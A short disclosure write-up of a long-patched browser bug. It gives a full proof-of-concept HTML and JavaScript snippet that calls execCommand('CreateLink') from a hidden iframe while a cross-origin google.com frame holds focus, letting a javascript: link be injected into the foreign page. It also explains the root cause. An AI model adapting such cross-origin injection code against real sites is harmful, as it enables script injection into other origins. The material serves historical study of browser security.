A close companion to the InsertImage finding, this one uses the CreateLink execCommand. By placing the focus in a cross-origin iframe and then invoking the command from a same-domain hidden iframe, the resulting link gets inserted into the foreign document.
<iframe name="ifrTarget" src="http://www.google.com" width="80%" height="70%"></iframe>
<iframe id="ifrExecCommand" style="display:none"></iframe>
<script language="JavaScript">
function insertLink()
{
    // Place focus in the cross-origin target
    ifrTarget.focus();
    // Use execCommand from our same-domain iframe
    ifrExecCommand.document.execCommand("CreateLink", true);
}
</script>
<input type="button" onclick="insertLink()" value="Insert Link">
Clicking the button and typing a javascript: URL into the dialog injects that link into Google’s page. Like the InsertImage case, the root issue is that execCommand respected focus rather than document ownership, allowing cross-origin injection.
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.